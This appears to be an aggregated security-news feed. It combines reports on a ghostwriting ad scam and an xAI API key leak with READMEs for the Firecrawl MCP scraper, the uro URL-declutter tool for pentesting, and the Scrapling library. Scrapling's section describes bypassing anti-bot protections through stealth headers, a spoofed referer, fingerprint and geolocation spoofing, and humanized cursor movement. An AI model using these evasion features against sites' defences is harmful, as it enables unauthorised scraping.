California resident Walter Horsting discovered something similar when he sued 360 Digital Marketing in small claims court last year, after hiring a company called Vox Ghostwriting to help write, edit and promote a spy novel he’d been working on. Horsting said he paid Vox $3,300 to ghostwrite a 280-page book, and was upsold an Amazon marketing and publishing package for $7,500.

In an interview, Horsting said the prose that Vox Ghostwriting produced was “juvenile at best,” forcing him to rewrite and edit the work himself, and to partner with a graphical artist to produce illustrations. Horsting said that when it came time to begin marketing the novel, Vox Ghostwriting tried to further upsell him on marketing packages, while dodging scheduled meetings with no follow-up.

“They have a money back guarantee, and when they wouldn’t refund my money I said I’m taking you to court,” Horsting recounted. “I tried to serve them in Los Angeles but found no such office exists. I talked to a salon next door and they said someone else had recently shown up desperately looking for where the ghostwriting company went, and it appears there are a trail of corpses on this. I finally tracked down where they are in Texas.”

It was the same office that Ms. Riley served her lawsuit against. Horsting said he has a court hearing scheduled later this month, but he’s under no illusions that winning the case means he’ll be able to collect.

“At this point, I’m doing it out of pride more than actually expecting anything to come to good fortune for me,” he said.

The following mind map was helpful in piecing together key events, individuals and connections mentioned above. It’s important to note that this graphic only scratches the surface of the operations tied to this group. For example, in Case 2 we can see mention of academic cheating services, wherein people can be hired to take online proctored exams on one’s behalf. Those who hire these services soon find themselves subject to impersonation and blackmail attempts for larger and larger sums of money, with the threat of publicly exposing their unethical academic cheating activity.

A “mind map” illustrating the connections between and among entities referenced in this story. Click to enlarge.

GOOGLE RESPONDS

KrebsOnSecurity reviewed the Google Ad Transparency links for nearly 500 different websites tied to this network of ghostwriting, logo, app and web development businesses. Those website names were then fed into spyfu.com, a competitive intelligence company that tracks the reach and performance of advertising keywords. Spyfu estimates that between April 2023 and April 2025, those websites spent more than $10 million on Google ads.

Reached for comment, Google said in a written statement that it is constantly policing its ad network for bad actors, pointing to an ads safety report (PDF) showing Google blocked or removed 5.1 billion bad ads last year — including more than 500 million ads related to trademarks.

“Our policy against Enabling Dishonest Behavior prohibits products or services that help users mislead others, including ads for paper-writing or exam-taking services,” the statement reads. “When we identify ads or advertisers that violate our policies, we take action, including by suspending advertiser accounts, disapproving ads, and restricting ads to specific domains when appropriate.”

Google did not respond to specific questions about the advertising entities mentioned in this story, saying only that “we are actively investigating this matter and addressing any policy violations, including suspending advertiser accounts when appropriate.”

From reviewing the ad accounts that have been promoting these scam websites, it appears Google has very recently acted to remove a large number of the offending ads. Prior to my notifying Google about the extent of this ad network on April 28, the Google Ad Transparency network listed over 500 ads for 360 Digital Marketing; as of this publication, that number had dwindled to 10.

On April 30, Google announced that starting this month its ads transparency page will display the payment profile name as the payer name for verified advertisers, if that name differs from their verified advertiser name. Searchengineland.com writes the changes are aimed at increasing accountability in digital advertising.

This spreadsheet lists the domain names, advertiser names, and Google Ad Transparency links for more than 350 entities offering ghostwriting, publishing, web design and academic cheating services.

KrebsOnSecurity would like to thank the anonymous security researcher NatInfoSec for their assistance in this investigation.

For further reading on Abtach and its myriad companies in all of the above-mentioned verticals (ghostwriting, logo design, etc.), see this Wikiwand entry.

Firecrawl-Mcp-Server - Official Firecrawl MCP Server - Adds Powerful Web Scraping To Cursor, Claude And Any Other LLM Clients

By: Unknown


A Model Context Protocol (MCP) server implementation that integrates with Firecrawl for web scraping capabilities.

Big thanks to @vrknetha, @cawstudios for the initial implementation!

You can also play around with our MCP Server on MCP.so's playground. Thanks to MCP.so for hosting and @gstarwd for integrating our server.

 

Features

  • Scrape, crawl, search, extract, deep research and batch scrape support
  • Web scraping with JS rendering
  • URL discovery and crawling
  • Web search with content extraction
  • Automatic retries with exponential backoff
  • Efficient batch processing with built-in rate limiting
  • Credit usage monitoring for cloud API
  • Comprehensive logging system
  • Support for cloud and self-hosted Firecrawl instances
  • Mobile/Desktop viewport support
  • Smart content filtering with tag inclusion/exclusion

Installation

Running with npx

env FIRECRAWL_API_KEY=fc-YOUR_API_KEY npx -y firecrawl-mcp

Manual Installation

npm install -g firecrawl-mcp

Running on Cursor

Configuring Cursor 🖥️
Note: Requires Cursor version 0.45.6+

For the most up-to-date configuration instructions, please refer to the official Cursor documentation on configuring MCP servers: Cursor MCP Server Configuration Guide

To configure Firecrawl MCP in Cursor v0.45.6

  1. Open Cursor Settings
  2. Go to Features > MCP Servers
  3. Click "+ Add New MCP Server"
  4. Enter the following:
    • Name: "firecrawl-mcp" (or your preferred name)
    • Type: "command"
    • Command: env FIRECRAWL_API_KEY=your-api-key npx -y firecrawl-mcp

To configure Firecrawl MCP in Cursor v0.48.6

  1. Open Cursor Settings
  2. Go to Features > MCP Servers
  3. Click "+ Add new global MCP server"
  4. Enter the following code:

{
  "mcpServers": {
    "firecrawl-mcp": {
      "command": "npx",
      "args": ["-y", "firecrawl-mcp"],
      "env": {
        "FIRECRAWL_API_KEY": "YOUR-API-KEY"
      }
    }
  }
}

If you are using Windows and are running into issues, try cmd /c "set FIRECRAWL_API_KEY=your-api-key && npx -y firecrawl-mcp"

Replace your-api-key with your Firecrawl API key. If you don't have one yet, you can create an account and get it from https://www.firecrawl.dev/app/api-keys

After adding, refresh the MCP server list to see the new tools. The Composer Agent will automatically use Firecrawl MCP when appropriate, but you can explicitly request it by describing your web scraping needs. Access the Composer via Command+L (Mac), select "Agent" next to the submit button, and enter your query.

Running on Windsurf

Add this to your ./codeium/windsurf/model_config.json:

{
  "mcpServers": {
    "mcp-server-firecrawl": {
      "command": "npx",
      "args": ["-y", "firecrawl-mcp"],
      "env": {
        "FIRECRAWL_API_KEY": "YOUR_API_KEY"
      }
    }
  }
}

Installing via Smithery (Legacy)

To install Firecrawl for Claude Desktop automatically via Smithery:

npx -y @smithery/cli install @mendableai/mcp-server-firecrawl --client claude

Configuration

Environment Variables

Required for Cloud API

  • FIRECRAWL_API_KEY: Your Firecrawl API key
    • Required when using the cloud API (default)
    • Optional when using a self-hosted instance with FIRECRAWL_API_URL
  • FIRECRAWL_API_URL (Optional): Custom API endpoint for self-hosted instances
    • Example: https://firecrawl.your-domain.com
    • If not provided, the cloud API will be used (requires an API key)

Optional Configuration

Retry Configuration
  • FIRECRAWL_RETRY_MAX_ATTEMPTS: Maximum number of retry attempts (default: 3)
  • FIRECRAWL_RETRY_INITIAL_DELAY: Initial delay in milliseconds before first retry (default: 1000)
  • FIRECRAWL_RETRY_MAX_DELAY: Maximum delay in milliseconds between retries (default: 10000)
  • FIRECRAWL_RETRY_BACKOFF_FACTOR: Exponential backoff multiplier (default: 2)
Credit Usage Monitoring
  • FIRECRAWL_CREDIT_WARNING_THRESHOLD: Credit usage warning threshold (default: 1000)
  • FIRECRAWL_CREDIT_CRITICAL_THRESHOLD: Credit usage critical threshold (default: 100)

Configuration Examples

For cloud API usage with custom retry and credit monitoring:

# Required for cloud API
export FIRECRAWL_API_KEY=your-api-key

# Optional retry configuration
export FIRECRAWL_RETRY_MAX_ATTEMPTS=5 # Increase max retry attempts
export FIRECRAWL_RETRY_INITIAL_DELAY=2000 # Start with 2s delay
export FIRECRAWL_RETRY_MAX_DELAY=30000 # Maximum 30s delay
export FIRECRAWL_RETRY_BACKOFF_FACTOR=3 # More aggressive backoff

# Optional credit monitoring
export FIRECRAWL_CREDIT_WARNING_THRESHOLD=2000 # Warning at 2000 credits
export FIRECRAWL_CREDIT_CRITICAL_THRESHOLD=500 # Critical at 500 credits

For self-hosted instance:

# Required for self-hosted
export FIRECRAWL_API_URL=https://firecrawl.your-domain.com

# Optional authentication for self-hosted
export FIRECRAWL_API_KEY=your-api-key # If your instance requires auth

# Custom retry configuration
export FIRECRAWL_RETRY_MAX_ATTEMPTS=10
export FIRECRAWL_RETRY_INITIAL_DELAY=500 # Start with faster retries

Usage with Claude Desktop

Add this to your claude_desktop_config.json:

{
  "mcpServers": {
    "mcp-server-firecrawl": {
      "command": "npx",
      "args": ["-y", "firecrawl-mcp"],
      "env": {
        "FIRECRAWL_API_KEY": "YOUR_API_KEY_HERE",

        "FIRECRAWL_RETRY_MAX_ATTEMPTS": "5",
        "FIRECRAWL_RETRY_INITIAL_DELAY": "2000",
        "FIRECRAWL_RETRY_MAX_DELAY": "30000",
        "FIRECRAWL_RETRY_BACKOFF_FACTOR": "3",

        "FIRECRAWL_CREDIT_WARNING_THRESHOLD": "2000",
        "FIRECRAWL_CREDIT_CRITICAL_THRESHOLD": "500"
      }
    }
  }
}

System Configuration

The server includes several configurable parameters that can be set via environment variables. Here are the default values if not configured:

const CONFIG = {
  retry: {
    maxAttempts: 3, // Number of retry attempts for rate-limited requests
    initialDelay: 1000, // Initial delay before first retry (in milliseconds)
    maxDelay: 10000, // Maximum delay between retries (in milliseconds)
    backoffFactor: 2, // Multiplier for exponential backoff
  },
  credit: {
    warningThreshold: 1000, // Warn when credit usage reaches this level
    criticalThreshold: 100, // Critical alert when credit usage reaches this level
  },
};

These configurations control:

  1. Retry Behavior
    • Automatically retries failed requests due to rate limits
    • Uses exponential backoff to avoid overwhelming the API
    • Example: With default settings, retries will be attempted at (see the sketch below):
      • 1st retry: 1 second delay
      • 2nd retry: 2 seconds delay
      • 3rd retry: 4 seconds delay (capped at maxDelay)

  2. Credit Usage Monitoring
    • Tracks API credit consumption for cloud API usage
    • Provides warnings at specified thresholds
    • Helps prevent unexpected service interruption
    • Example: With default settings:
      • Warning at 1000 credits remaining
      • Critical alert at 100 credits remaining
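
For illustration only, here is a minimal Python sketch (not the server's actual code; the function name is ours) that reproduces the retry schedule implied by the default values above:

def backoff_delays(max_attempts=3, initial_delay=1.0, max_delay=10.0, factor=2.0):
    # Yield the delay (in seconds) before each retry attempt,
    # multiplying by the backoff factor and never exceeding max_delay.
    delay = initial_delay
    for _ in range(max_attempts):
        yield min(delay, max_delay)
        delay *= factor

print(list(backoff_delays()))  # [1.0, 2.0, 4.0] with the defaults above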

Rate Limiting and Batch Processing

The server utilizes Firecrawl's built-in rate limiting and batch processing capabilities:

  • Automatic rate limit handling with exponential backoff
  • Efficient parallel processing for batch operations
  • Smart request queuing and throttling
  • Automatic retries for transient errors

Available Tools

1. Scrape Tool (firecrawl_scrape)

Scrape content from a single URL with advanced options.

{
  "name": "firecrawl_scrape",
  "arguments": {
    "url": "https://example.com",
    "formats": ["markdown"],
    "onlyMainContent": true,
    "waitFor": 1000,
    "timeout": 30000,
    "mobile": false,
    "includeTags": ["article", "main"],
    "excludeTags": ["nav", "footer"],
    "skipTlsVerification": false
  }
}

2. Batch Scrape Tool (firecrawl_batch_scrape)

Scrape multiple URLs efficiently with built-in rate limiting and parallel processing.

{
  "name": "firecrawl_batch_scrape",
  "arguments": {
    "urls": ["https://example1.com", "https://example2.com"],
    "options": {
      "formats": ["markdown"],
      "onlyMainContent": true
    }
  }
}

Response includes operation ID for status checking:

{
  "content": [
    {
      "type": "text",
      "text": "Batch operation queued with ID: batch_1. Use firecrawl_check_batch_status to check progress."
    }
  ],
  "isError": false
}

3. Check Batch Status (firecrawl_check_batch_status)

Check the status of a batch operation.

{
  "name": "firecrawl_check_batch_status",
  "arguments": {
    "id": "batch_1"
  }
}

4. Search Tool (firecrawl_search)

Search the web and optionally extract content from search results.

{
  "name": "firecrawl_search",
  "arguments": {
    "query": "your search query",
    "limit": 5,
    "lang": "en",
    "country": "us",
    "scrapeOptions": {
      "formats": ["markdown"],
      "onlyMainContent": true
    }
  }
}

5. Crawl Tool (firecrawl_crawl)

Start an asynchronous crawl with advanced options.

{
  "name": "firecrawl_crawl",
  "arguments": {
    "url": "https://example.com",
    "maxDepth": 2,
    "limit": 100,
    "allowExternalLinks": false,
    "deduplicateSimilarURLs": true
  }
}

6. Extract Tool (firecrawl_extract)

Extract structured information from web pages using LLM capabilities. Supports both cloud AI and self-hosted LLM extraction.

{
  "name": "firecrawl_extract",
  "arguments": {
    "urls": ["https://example.com/page1", "https://example.com/page2"],
    "prompt": "Extract product information including name, price, and description",
    "systemPrompt": "You are a helpful assistant that extracts product information",
    "schema": {
      "type": "object",
      "properties": {
        "name": { "type": "string" },
        "price": { "type": "number" },
        "description": { "type": "string" }
      },
      "required": ["name", "price"]
    },
    "allowExternalLinks": false,
    "enableWebSearch": false,
    "includeSubdomains": false
  }
}

Example response:

{
  "content": [
    {
      "type": "text",
      "text": {
        "name": "Example Product",
        "price": 99.99,
        "description": "This is an example product description"
      }
    }
  ],
  "isError": false
}

Extract Tool Options:

  • urls: Array of URLs to extract information from
  • prompt: Custom prompt for the LLM extraction
  • systemPrompt: System prompt to guide the LLM
  • schema: JSON schema for structured data extraction
  • allowExternalLinks: Allow extraction from external links
  • enableWebSearch: Enable web search for additional context
  • includeSubdomains: Include subdomains in extraction

When using a self-hosted instance, the extraction will use your configured LLM. For cloud API, it uses Firecrawl's managed LLM service.

7. Deep Research Tool (firecrawl_deep_research)

Conduct deep web research on a query using intelligent crawling, search, and LLM analysis.

{
  "name": "firecrawl_deep_research",
  "arguments": {
    "query": "how does carbon capture technology work?",
    "maxDepth": 3,
    "timeLimit": 120,
    "maxUrls": 50
  }
}

Arguments:

  • query (string, required): The research question or topic to explore.
  • maxDepth (number, optional): Maximum recursive depth for crawling/search (default: 3).
  • timeLimit (number, optional): Time limit in seconds for the research session (default: 120).
  • maxUrls (number, optional): Maximum number of URLs to analyze (default: 50).

Returns:

  • Final analysis generated by an LLM based on research. (data.finalAnalysis)
  • May also include structured activities and sources used in the research process.

8. Generate LLMs.txt Tool (firecrawl_generate_llmstxt)

Generate a standardized llms.txt (and optionally llms-full.txt) file for a given domain. This file defines how large language models should interact with the site.

{
  "name": "firecrawl_generate_llmstxt",
  "arguments": {
    "url": "https://example.com",
    "maxUrls": 20,
    "showFullText": true
  }
}

Arguments:

  • url (string, required): The base URL of the website to analyze.
  • maxUrls (number, optional): Max number of URLs to include (default: 10).
  • showFullText (boolean, optional): Whether to include llms-full.txt contents in the response.

Returns:

  • Generated llms.txt file contents and optionally the llms-full.txt (data.llmstxt and/or data.llmsfulltxt)

Logging System

The server includes comprehensive logging:

  • Operation status and progress
  • Performance metrics
  • Credit usage monitoring
  • Rate limit tracking
  • Error conditions

Example log messages:

[INFO] Firecrawl MCP Server initialized successfully
[INFO] Starting scrape for URL: https://example.com
[INFO] Batch operation queued with ID: batch_1
[WARNING] Credit usage has reached warning threshold
[ERROR] Rate limit exceeded, retrying in 2s...

Error Handling

The server provides robust error handling:

  • Automatic retries for transient errors
  • Rate limit handling with backoff
  • Detailed error messages
  • Credit usage warnings
  • Network resilience

Example error response:

{
  "content": [
    {
      "type": "text",
      "text": "Error: Rate limit exceeded. Retrying in 2 seconds..."
    }
  ],
  "isError": true
}

Development

# Install dependencies
npm install

# Build
npm run build

# Run tests
npm test

Contributing

  1. Fork the repository
  2. Create your feature branch
  3. Run tests: npm test
  4. Submit a pull request

License

MIT License - see LICENSE file for details



xAI Dev Leaks API Key for Private SpaceX, Tesla LLMs

An employee at Elon Musk’s artificial intelligence company xAI leaked a private key on GitHub that for the past two months could have allowed anyone to query private xAI large language models (LLMs) which appear to have been custom made for working with internal data from Musk’s companies, including SpaceX, Tesla and Twitter/X, KrebsOnSecurity has learned.

Image: Shutterstock, @sdx15.

Philippe Caturegli, “chief hacking officer” at the security consultancy Seralys, was the first to publicize the leak of credentials for an x.ai application programming interface (API) exposed in the GitHub code repository of a technical staff member at xAI.

Caturegli’s post on LinkedIn caught the attention of researchers at GitGuardian, a company that specializes in detecting and remediating exposed secrets in public and proprietary environments. GitGuardian’s systems constantly scan GitHub and other code repositories for exposed API keys, and fire off automated alerts to affected users.

GitGuardian’s Eric Fourrier told KrebsOnSecurity the exposed API key had access to several unreleased models of Grok, the AI chatbot developed by xAI. In total, GitGuardian found the key had access to at least 60 fine-tuned and private LLMs.

“The credentials can be used to access the X.ai API with the identity of the user,” GitGuardian wrote in an email explaining their findings to xAI. “The associated account not only has access to public Grok models (grok-2-1212, etc) but also to what appears to be unreleased (grok-2.5V), development (research-grok-2p5v-1018), and private models (tweet-rejector, grok-spacex-2024-11-04).”

Fourrier found GitGuardian had alerted the xAI employee about the exposed API key nearly two months ago — on March 2. But as of April 30, when GitGuardian directly alerted xAI’s security team to the exposure, the key was still valid and usable. xAI told GitGuardian to report the matter through its bug bounty program at HackerOne, but just a few hours later the repository containing the API key was removed from GitHub.

“It looks like some of these internal LLMs were fine-tuned on SpaceX data, and some were fine-tuned with Tesla data,” Fourrier said. “I definitely don’t think a Grok model that’s fine-tuned on SpaceX data is intended to be exposed publicly.”

xAI did not respond to a request for comment. Nor did the 28-year-old xAI technical staff member whose key was exposed.

Carole Winqwist, chief marketing officer at GitGuardian, said giving potentially hostile users free access to private LLMs is a recipe for disaster.

“If you’re an attacker and you have direct access to the model and the back end interface for things like Grok, it’s definitely something you can use for further attacking,” she said. “An attacker could use it for prompt injection, to tweak the (LLM) model to serve their purposes, or try to implant code into the supply chain.”

The inadvertent exposure of internal LLMs for xAI comes as Musk’s so-called Department of Government Efficiency (DOGE) has been feeding sensitive government records into artificial intelligence tools. In February, The Washington Post reported DOGE officials were feeding data from across the Education Department into AI tools to probe the agency’s programs and spending.

The Post said DOGE plans to replicate this process across many departments and agencies, accessing the back-end software at different parts of the government and then using AI technology to extract and sift through information about spending on employees and programs.

“Feeding sensitive data into AI software puts it into the possession of a system’s operator, increasing the chances it will be leaked or swept up in cyberattacks,” Post reporters wrote.

Wired reported in March that DOGE has deployed a proprietary chatbot called GSAi to 1,500 federal workers at the General Services Administration, part of an effort to automate tasks previously done by humans as DOGE continues its purge of the federal workforce.

A Reuters report last month said Trump administration officials told some U.S. government employees that DOGE is using AI to surveil at least one federal agency’s communications for hostility to President Trump and his agenda. Reuters wrote that the DOGE team has heavily deployed Musk’s Grok AI chatbot as part of their work slashing the federal government, although Reuters said it could not establish exactly how Grok was being used.

Caturegli said while there is no indication that federal government or user data could be accessed through the exposed x.ai API key, these private models are likely trained on proprietary data and may unintentionally expose details related to internal development efforts at xAI, Twitter, or SpaceX.

“The fact that this key was publicly exposed for two months and granted access to internal models is concerning,” Caturegli said. “This kind of long-lived credential exposure highlights weak key management and insufficient internal monitoring, raising questions about safeguards around developer access and broader operational security.”

Uro - Declutters Url Lists For Crawling/Pentesting

By: Unknown


Using a URL list for security testing can be painful as there are a lot of URLs that have uninteresting/duplicate content; uro aims to solve that.

It doesn't make any http requests to the URLs and removes:
  • incremental urls e.g. /page/1/ and /page/2/
  • blog posts and similar human written content e.g. /posts/a-brief-history-of-time
  • urls with same path but parameter value difference e.g. /page.php?id=1 and /page.php?id=2 (see the sketch after this list)
  • images, js, css and other "useless" files
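
As a rough illustration of that idea, here is a minimal Python sketch (not uro's actual implementation) that collapses URLs sharing the same path and parameter names:

from urllib.parse import urlsplit, parse_qs

def dedupe(urls):
    # Keep one URL per (host, path, parameter-name set), so
    # /page.php?id=1 and /page.php?id=2 collapse into one entry.
    seen, kept = set(), []
    for url in urls:
        parts = urlsplit(url)
        key = (parts.netloc, parts.path, tuple(sorted(parse_qs(parts.query))))
        if key not in seen:
            seen.add(key)
            kept.append(url)
    return kept

print(dedupe(['http://example.com/page.php?id=1', 'http://example.com/page.php?id=2']))
# ['http://example.com/page.php?id=1']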


Installation

The recommended way to install uro is as follows:

pipx install uro

Note: If you are using an older version of python, use pip instead of pipx

Basic Usage

The quickest way to include uro in your workflow is to feed it data through stdin and print it to your terminal.

cat urls.txt | uro

Advanced usage

Reading urls from a file (-i/--input)

uro -i input.txt

Writing urls to a file (-o/--output)

If the file already exists, uro will not overwrite the contents. Otherwise, it will create a new file.

uro -i input.txt -o output.txt

Whitelist (-w/--whitelist)

uro will ignore all other extensions except the ones provided.

uro -w php asp html

Note: Extensionless pages e.g. /books/1 will still be included. To remove them too, use --filter hasext.

Blacklist (-b/--blacklist)

uro will ignore the given extensions.

uro -b jpg png js pdf

Note: uro has a list of "useless" extensions which it removes by default; that list will be overridden by whatever extensions you provide through blacklist option. Extensionless pages e.g. /books/1 will still be included. To remove them too, use --filter hasext.

Filters (-f/--filters)

For granular control, uro supports the following filters:

  1. hasparams: only output urls that have query parameters e.g. http://example.com/page.php?id=
  2. noparams: only output urls that have no query parameters e.g. http://example.com/page.php
  3. hasext: only output urls that have extensions e.g. http://example.com/page.php
  4. noext: only output urls that have no extensions e.g. http://example.com/page
  5. allexts: don't remove any page based on extension e.g. keep .jpg which would be removed otherwise
  6. keepcontent: keep human written content e.g. blogs.
  7. keepslash: don't remove trailing slash from urls e.g. http://example.com/page/
  8. vuln: only output urls with parameters that are known to be vulnerable. More info.

Example: uro --filters hasext hasparams



Scrapling - An Undetectable, Powerful, Flexible, High-Performance Python Library That Makes Web Scraping Simple And Easy Again!

By: Unknown


Dealing with failing web scrapers due to anti-bot protections or website changes? Meet Scrapling.

Scrapling is a high-performance, intelligent web scraping library for Python that automatically adapts to website changes while significantly outperforming popular alternatives. For both beginners and experts, Scrapling provides powerful features while maintaining simplicity.

>> from scrapling.defaults import Fetcher, AsyncFetcher, StealthyFetcher, PlayWrightFetcher
# Fetch websites' source under the radar!
>> page = StealthyFetcher.fetch('https://example.com', headless=True, network_idle=True)
>> print(page.status)
200
>> products = page.css('.product', auto_save=True) # Scrape data that survives website design changes!
>> # Later, if the website structure changes, pass `auto_match=True`
>> products = page.css('.product', auto_match=True) # and Scrapling still finds them!

Key Features

Fetch websites as you prefer with async support

  • HTTP Requests: Fast and stealthy HTTP requests with the Fetcher class.
  • Dynamic Loading & Automation: Fetch dynamic websites with the PlayWrightFetcher class through your real browser, Scrapling's stealth mode, Playwright's Chrome browser, or NSTbrowser's browserless!
  • Anti-bot Protections Bypass: Easily bypass protections with StealthyFetcher and PlayWrightFetcher classes.

Adaptive Scraping

  • 🔄 Smart Element Tracking: Relocate elements after website changes, using an intelligent similarity system and integrated storage.
  • 🎯 Flexible Selection: CSS selectors, XPath selectors, filters-based search, text search, regex search and more.
  • 🔍 Find Similar Elements: Automatically locate elements similar to the element you found!
  • 🧠 Smart Content Scraping: Extract data from multiple websites without specific selectors using Scrapling's powerful features.

High Performance

  • 🚀 Lightning Fast: Built from the ground up with performance in mind, outperforming most popular Python scraping libraries.
  • 🔋 Memory Efficient: Optimized data structures for minimal memory footprint.
  • Fast JSON serialization: 10x faster than standard library.

Developer Friendly

  • 🛠️ Powerful Navigation API: Easy DOM traversal in all directions.
  • 🧬 Rich Text Processing: All strings have built-in regex, cleaning methods, and more. All elements' attributes are optimized dictionaries that take less memory than standard dictionaries, with added methods.
  • 📝 Auto Selectors Generation: Generate robust short and full CSS/XPath selectors for any element.
  • 🔌 Familiar API: Similar to Scrapy/BeautifulSoup and the same pseudo-elements used in Scrapy.
  • 📘 Type hints: Complete type/doc-strings coverage for future-proofing and best autocompletion support.

Getting Started

from scrapling.fetchers import Fetcher

fetcher = Fetcher(auto_match=False)

# Do http GET request to a web page and create an Adaptor instance
page = fetcher.get('https://quotes.toscrape.com/', stealthy_headers=True)
# Get all text content from all HTML tags in the page except `script` and `style` tags
page.get_all_text(ignore_tags=('script', 'style'))

# Get all quotes elements, any of these methods will return a list of strings directly (TextHandlers)
quotes = page.css('.quote .text::text') # CSS selector
quotes = page.xpath('//span[@class="text"]/text()') # XPath
quotes = page.css('.quote').css('.text::text') # Chained selectors
quotes = [element.text for element in page.css('.quote .text')] # Slower than bulk query above

# Get the first quote element
quote = page.css_first('.quote') # same as page.css('.quote').first or page.css('.quote')[0]

# Tired of selectors? Use find_all/find
# Get all 'div' HTML tags that one of its 'class' values is 'quote'
quotes = page.find_all('div', {'class': 'quote'})
# Same as
quotes = page.find_all('div', class_='quote')
quotes = page.find_all(['div'], class_='quote')
quotes = page.find_all(class_='quote') # and so on...

# Working with elements
quote.html_content # Get Inner HTML of this element
quote.prettify() # Prettified version of Inner HTML above
quote.attrib # Get that element's attributes
quote.path # DOM path to element (List of all ancestors from <html> tag till the element itself)

To keep it simple, all methods can be chained on top of each other!

Parsing Performance

Scrapling isn't just powerful - it's also blazing fast. Scrapling implements many best practices, design patterns, and numerous optimizations to save fractions of seconds. All of that while focusing exclusively on parsing HTML documents. Here are benchmarks comparing Scrapling to popular Python libraries in two tests.

Text Extraction Speed Test (5000 nested elements).

# Library Time (ms) vs Scrapling
1 Scrapling 5.44 1.0x
2 Parsel/Scrapy 5.53 1.017x
3 Raw Lxml 6.76 1.243x
4 PyQuery 21.96 4.037x
5 Selectolax 67.12 12.338x
6 BS4 with Lxml 1307.03 240.263x
7 MechanicalSoup 1322.64 243.132x
8 BS4 with html5lib 3373.75 620.175x

As you can see, Scrapling is on par with Parsel/Scrapy and slightly faster than raw Lxml, which both libraries are built on top of. These are the closest results to Scrapling. PyQuery is also built on top of Lxml, but Scrapling is still about 4 times faster.

Extraction By Text Speed Test

Library Time (ms) vs Scrapling
Scrapling 2.51 1.0x
AutoScraper 11.41 4.546x

Scrapling can find elements with more methods, and it returns full element Adaptor objects rather than only the text, as AutoScraper does. So, to make this test fair, both libraries extract an element by its text, find similar elements, and then extract the text content for all of them. As you can see, Scrapling is still 4.5 times faster at the same task.

All benchmarks' results are an average of 100 runs. See our benchmarks.py for methodology and to run your comparisons.

Installation

Scrapling is a breeze to get started with; starting from version 0.2.9, it requires at least Python 3.9 to work.

pip3 install scrapling

Then run this command to install browsers' dependencies needed to use Fetcher classes

scrapling install

If you have any installation issues, please open an issue.

Fetching Websites

Fetchers are interfaces built on top of other libraries, with added features, that make the request or fetch the page for you in a single call and then return an Adaptor object. This feature was introduced because previously the only option was to fetch the page however you wanted, then pass it manually to the Adaptor class to create an Adaptor instance and start playing around with the page.

Features

You might be slightly confused by now so let me clear things up. All fetcher-type classes are imported in the same way

from scrapling.fetchers import Fetcher, StealthyFetcher, PlayWrightFetcher

All of them can take these initialization arguments: auto_match, huge_tree, keep_comments, keep_cdata, storage, and storage_args, which are the same ones you give to the Adaptor class.

If you don't want to pass arguments to the generated Adaptor object and want to use the default values, you can use this import instead for cleaner code:

from scrapling.defaults import Fetcher, AsyncFetcher, StealthyFetcher, PlayWrightFetcher

then use it right away without initializing like:

page = StealthyFetcher.fetch('https://example.com') 

Also, the Response object returned from all fetchers is the same as the Adaptor object except it has these added attributes: status, reason, cookies, headers, history, and request_headers. All cookies, headers, and request_headers are always of type dictionary.
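
A quick sketch of those extra attributes in use (httpbin.org is only an example target):

>> from scrapling.defaults import Fetcher
>> page = Fetcher.get('https://httpbin.org/get')
>> page.status          # HTTP status code, e.g. 200
>> page.reason          # status text of the response
>> page.cookies         # always a plain dictionary
>> page.headers         # always a plain dictionary
>> page.request_headers # the headers that were actually sent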

[!NOTE] The auto_match argument is enabled by default which is the one you should care about the most as you will see later.

Fetcher

This class is built on top of httpx with additional configuration options, here you can do GET, POST, PUT, and DELETE requests.

For all methods, you have stealthy_headers, which makes Fetcher create and use real browser headers and then set a referer header as if the request came from a Google search for this URL's domain. It's enabled by default. You can also set the number of retries with the retries argument for all methods, which makes httpx retry requests that fail for any reason. The default number of retries for all Fetcher methods is 3.

Note: All headers generated by the stealthy_headers argument can be overwritten by you through the headers argument

You can route all traffic (HTTP and HTTPS) to a proxy for any of these methods in this format http://username:password@localhost:8030

>> page = Fetcher().get('https://httpbin.org/get', stealthy_headers=True, follow_redirects=True)
>> page = Fetcher().post('https://httpbin.org/post', data={'key': 'value'}, proxy='http://username:password@localhost:8030')
>> page = Fetcher().put('https://httpbin.org/put', data={'key': 'value'})
>> page = Fetcher().delete('https://httpbin.org/delete')
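
And a one-line sketch of the retries argument described above (the value 5 is arbitrary):

>> page = Fetcher().get('https://httpbin.org/get', retries=5)  # httpx will retry up to 5 times on failure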

For Async requests, you will just replace the import like below:

>> from scrapling.fetchers import AsyncFetcher
>> page = await AsyncFetcher().get('https://httpbin.org/get', stealthy_headers=True, follow_redirects=True)
>> page = await AsyncFetcher().post('https://httpbin.org/post', data={'key': 'value'}, proxy='http://username:password@localhost:8030')
>> page = await AsyncFetcher().put('https://httpbin.org/put', data={'key': 'value'})
>> page = await AsyncFetcher().delete('https://httpbin.org/delete')

StealthyFetcher

This class is built on top of Camoufox, bypassing most anti-bot protections by default. Scrapling adds extra layers of flavors and configurations to increase performance and undetectability even further.

>> page = StealthyFetcher().fetch('https://www.browserscan.net/bot-detection')  # Running headless by default
>> page.status == 200
True
>> page = await StealthyFetcher().async_fetch('https://www.browserscan.net/bot-detection') # the async version of fetch
>> page.status == 200
True

Note: all requests done by this fetcher wait by default for all JS to be fully loaded and executed, so you don't have to :)

For the sake of simplicity, here is the complete list of arguments:

  • url (required): Target url.
  • headless: Pass True to run the browser in headless/hidden mode (default), 'virtual' to run it in virtual screen mode, or False for headful/visible mode. The virtual mode requires xvfb to be installed.
  • block_images: Prevent the loading of images through Firefox preferences. This can help save your proxy usage, but be careful with this option, as it makes some websites never finish loading.
  • disable_resources: Drop requests of unnecessary resources for a speed boost. It depends, but it made requests ~25% faster in my tests for some websites. Requests dropped are of type font, image, media, beacon, object, imageset, texttrack, websocket, csp_report, and stylesheet. This can help save your proxy usage, but be careful with this option, as it makes some websites never finish loading.
  • google_search: Enabled by default; Scrapling will set the referer header to be as if this request came from a Google search for this website's domain name.
  • extra_headers: A dictionary of extra headers to add to the request. The referer set by the google_search argument takes priority over the referer set here if used together.
  • block_webrtc: Blocks WebRTC entirely.
  • page_action: Added for automation. A function that takes the page object, does the automation you need, then returns page again.
  • addons: List of Firefox addons to use. Must be paths to extracted addons.
  • humanize: Humanize the cursor movement. Takes either True or the maximum duration in seconds of the cursor movement. The cursor typically takes up to 1.5 seconds to move across the window.
  • allow_webgl: Enabled by default. Disabling WebGL is not recommended, as many WAFs now check whether WebGL is enabled.
  • geoip: Recommended to use with proxies; automatically uses the IP's longitude, latitude, timezone, country and locale, and spoofs the WebRTC IP address. It will also calculate and spoof the browser's language based on the distribution of language speakers in the target region.
  • disable_ads: Disabled by default; if enabled, this installs the uBlock Origin addon in the browser.
